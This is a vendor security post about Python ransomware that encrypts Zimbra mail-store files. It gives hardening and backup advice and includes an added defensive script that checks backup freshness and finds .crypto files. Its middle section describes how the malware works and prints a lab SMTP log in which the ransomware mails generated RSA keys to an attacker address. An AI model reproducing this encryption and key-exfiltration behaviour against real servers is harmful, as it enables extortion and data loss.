Security news – Zimbra ransomware written in Python

Lawrence Abrams of Bleeping Computer has reported that there is a new ransomware variant, written in Python, that is targeting ZCS server data under /opt/zimbra/store/.

Note: You may have read articles about this issue that encourage you to download software to remove a possible ransomware infection. Such articles and pages usually push tools for the Windows™ operating system that themselves contain spyware or other malware; please avoid them. Zimbra Collaboration does not run on Windows™, and this ransomware needs shell access to the server in order to be executed. That means this is not a Zimbra issue as such, but rather an insecurely configured environment, especially at the SSH level.

How can you protect your Server/s from this, or other, ransomware?

At this point, no details have been provided about how any servers were compromised. Without any details, the best advice we can give is:

  • Get (and stay) up to date on OS version and patches.
  • Get (and stay) up to date on Zimbra Collaboration version and patches.
  • Ensure servers are properly firewalled (see Ports) and only allow access to the minimum number of services that is required to meet your business requirements.
  • Review and compare your system configuration against best practices like the CIS benchmarks.
  • Protect your SSH service with Fail2Ban or similar measures. If possible, restrict SSH access to a VPN, and always use public/private key authentication instead of passwords.

What can I do if I have been infected by this ransomware?

We strongly recommend opening a Support Ticket with our Engineers as soon as possible on the Support Portal.

If you are a Network Edition customer, please be sure you have enabled and are running the Backup & Restore feature we include with our product. Also verify that recent backup sessions actually exist in the backup directory, for example:

root@mail:~# ls /opt/zimbra/backup/sessions/ -la
total 172
drwxr-x--- 43 zimbra zimbra 4096 Jun 23 01:00 .
drwxr-xr-x  4 zimbra zimbra 4096 Jun 23 00:00 ..
drwxr-x---  6 zimbra zimbra 4096 Jun 19 01:00 full-20160619.050020.544
drwxr-x---  6 zimbra zimbra 4096 Jun 19 01:00 incr-20160619.050008.658
drwxr-x---  6 zimbra zimbra 4096 Jun 20 01:00 incr-20160620.050009.077
drwxr-x---  6 zimbra zimbra 4096 Jun 21 01:00 incr-20160621.050009.873
drwxr-x---  6 zimbra zimbra 4096 Jun 22 01:00 incr-20160622.050011.071
drwxr-x---  6 zimbra zimbra 4096 Jun 23 01:00 incr-20160623.050009.101
If you are running the Open Source version of our product, make sure you have an rsync copy of the entire /opt/zimbra directory, following the articles on our Wiki, and please let us know about your issue in our Community Forums thread, where the Community can help you.

How does this Zimbra ransomware work?

In our lab, we needed to install a couple of Python dependencies to make the script work, which means that the attacker first needs shell access via SSH to install those dependencies:

  • python-dev
  • pip install pycrypto

Once the Zimbra ransomware has been executed, the script walks the entire /opt/zimbra/store folder, encrypts every file using AES encryption, and appends a .crypto extension. At the same time, the script composes an email that is sent to the (as yet unidentified) attacker. It then drops a note at /root/how.txt demanding 3 bitcoins to get the files back.

Here is how it looks when we run the process on a test server:

AY6ZxcQ+EXwtBYnM3KKyzKBcYAvJRoCa
send: 'ehlo zimbraransom.zimbra.io\r\n'
reply: '250-mail.com Hello zimbraransom.zimbra.io [XX.XX.XX.XX]\r\n'
reply: '250-SIZE 157286400\r\n'
reply: '250 STARTTLS\r\n'
reply: retcode (250); Msg: mail.com Hello zimbraransom.zimbra.io [XX.XX.XX.XX]
SIZE 157286400
STARTTLS
send: 'mail FROM:<support@mail.com> size=2174\r\n'
reply: '250 Requested mail action okay, completed\r\n'
reply: retcode (250); Msg: Requested mail action okay, completed
send: 'rcpt TO:<mpritsken@priest.com>\r\n'
reply: '250 OK\r\n'
reply: retcode (250); Msg: OK
send: 'data\r\n'
reply: '354 Start mail input; end with <CRLF>.<CRLF>\r\n'
reply: retcode (354); Msg: Start mail input; end with <CRLF>.<CRLF>
data: (354, 'Start mail input; end with <CRLF>.<CRLF>')
send: 'PuK: -----BEGIN PUBLIC KEY-----\r\n
MIIBIjANBgkqhkiG9wr\n
-----END PUBLIC KEY-----\r\n
PrK: -----BEGIN RSA PRIVATE KEY-----\r\n
MIIEoQIBAAKCAQEAoFGbiLdpi0cWnDujKyKhWbSYpx\r\n
-----END RSA PRIVATE KEY-----\r\n
EAS: AY6ZxcQ+EXwtBYnM3KKyzKBcYAvJRoCa\r\n.\r\n'
reply: '250 Requested mail action okay, completed: id=0Lwbov-1bR4xk2xH5-018KEZ\r\n'
reply: retcode (250); Msg: Requested mail action okay, completed: id=0Lwbov-1bR4xk2xH5-018KEZ
data: (250, 'Requested mail action okay, completed: id=0Lwbov-1bR4xk2xH5-018KEZ')
send: 'quit\r\n'
reply: '221 mail.com Service closing transmission channel\r\n'
reply: retcode (221); Msg: mail.com Service closing transmission channel

Once encrypted, the files under /opt/zimbra/store are no longer usable and carry the .crypto extension:

root@zimbraransom:~# ls -la /opt/zimbra/store/
total 16
drwxr-xr-x 2 root root 4096 Jun 23 13:15 .
drwxr-xr-x 3 root root 4096 Jun 23 13:14 ..
-rw-r--r-- 1 root root   40 Jun 23 13:15 file2.txt.crypto
-rw-r--r-- 1 root root   40 Jun 23 13:15 hello.txt.crypto
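As an added illustration (not part of the original article or of Zimbra's own tooling), the following Python script wraps the two checks this post recommends: that Backup & Restore session directories under /opt/zimbra/backup/sessions/ are recent, and that nothing under /opt/zimbra/store carries the .crypto suffix. The session names, store paths and the 36-hour staleness threshold are constructed sample values modelled on the listings above.

```python
import re
from datetime import datetime, timedelta

# Backup session directories are named <kind>-YYYYMMDD.HHMMSS.mmm, as in
# the ls listing above; kind is "full" or "incr".
SESSION_RE = re.compile(r"^(full|incr)-(\d{8})\.(\d{6})\.\d{3}$")

# Constructed sample data modelled on the two listings in this article.
SAMPLE_SESSIONS = ["full-20160619.050020.544", "incr-20160619.050008.658",
                   "incr-20160623.050009.101", "tmp-not-a-session"]
SAMPLE_STORE = ["/opt/zimbra/store/0/1/msg/0/file2.txt.crypto",
                "/opt/zimbra/store/0/1/msg/0/hello.txt.crypto",
                "/opt/zimbra/store/0/2/msg/0/258-1.msg"]
SAMPLE_NOW = datetime(2016, 6, 23, 13, 0)  # constructed "current time"


def parse_session(name):
    """Return (kind, timestamp) for a backup session name, else None."""
    m = SESSION_RE.match(name)
    if m is None:
        return None
    kind, day, clock = m.groups()
    return kind, datetime.strptime(day + clock, "%Y%m%d%H%M%S")


def backup_status(session_names, now=None, max_age=timedelta(hours=36)):
    """Newest full/incr session; 'stale' when nothing is younger than max_age."""
    now = now or datetime.now()
    latest = {"full": None, "incr": None}
    for name in session_names:
        parsed = parse_session(name)
        if parsed is None:
            continue  # not a session directory (e.g. a stray temp dir)
        kind, ts = parsed
        if latest[kind] is None or ts > latest[kind]:
            latest[kind] = ts
    newest = max((t for t in latest.values() if t), default=None)
    stale = newest is None or now - newest > max_age
    return {"full": latest["full"], "incr": latest["incr"], "stale": stale}


def find_encrypted(paths, marker=".crypto"):
    """Return the paths that carry the ransomware's .crypto suffix."""
    return sorted(p for p in paths if p.endswith(marker))


if __name__ == "__main__":
    print(backup_status(SAMPLE_SESSIONS, now=SAMPLE_NOW))
    print(find_encrypted(SAMPLE_STORE))
```

On a live server, feed `os.listdir("/opt/zimbra/backup/sessions")` to `backup_status` and an `os.walk` of /opt/zimbra/store to `find_encrypted`; a stale backup combined with any .crypto hit is the signal to open a Support Ticket immediately.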

Keep us posted on this Blog article, or in the official Forum thread for this issue – https://forums.zimbra.org/viewtopic.php?t=59774
